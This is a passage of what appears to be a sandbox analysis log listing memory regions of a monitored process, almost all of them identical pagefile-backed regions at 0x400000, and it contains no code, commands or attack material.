1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10241 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10242 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10243 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10244 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10245 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10246 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10247 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10248 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10249 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10250 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10251 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10252 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10253 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10254 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10255 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10256 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10257 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10258 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10259 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10260 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10261 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10262 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10263 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10264 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10265 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10266 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10267 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10268 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10269 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10270 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10271 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10272 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10273 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10274 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10275 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10276 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10277 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10278 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10279 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10280 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10281 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10282 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10283 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10284 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10285 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10286 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10287 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10288 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10289 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10290 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10291 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10292 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10293 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10294 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10295 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10296 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10297 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10298 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10299 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10300 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10301 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10302 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10303 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10304 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10305 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10306 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10307 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10308 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10309 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10310 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10311 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10312 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10313 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10314 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10315 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10316 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10317 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10318 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10319 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10320 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10321 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10322 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10323 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10324 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10325 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10326 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10327 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10328 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10329 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10330 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10331 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10332 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10333 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10334 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10335 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10336 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10337 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10338 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10339 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10340 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10341 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10342 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10343 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10344 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10345 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10346 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10347 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10348 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10349 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10350 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10351 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10352 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10353 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10354 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10355 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10356 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10357 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10358 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10359 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10360 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10361 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10362 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10363 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10364 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10365 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10366 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10367 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10368 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10369 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10370 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10371 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10372 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10373 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10374 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10375 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10376 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10377 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10378 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10379 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10380 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10382 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10383 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10384 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10386 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10387 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10388 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10389 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10390 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10391 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10392 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10393 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10394 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10395 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10396 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10397 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10398 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10399 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10400 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10401 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10402 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10403 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10404 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10405 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10406 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10407 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10408 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10409 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10410 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10411 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10412 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10413 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10414 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10415 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10416 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10417 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10418 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10419 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10420 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10421 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10422 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10423 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10424 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10425 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10426 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10427 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10428 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10429 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10430 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = 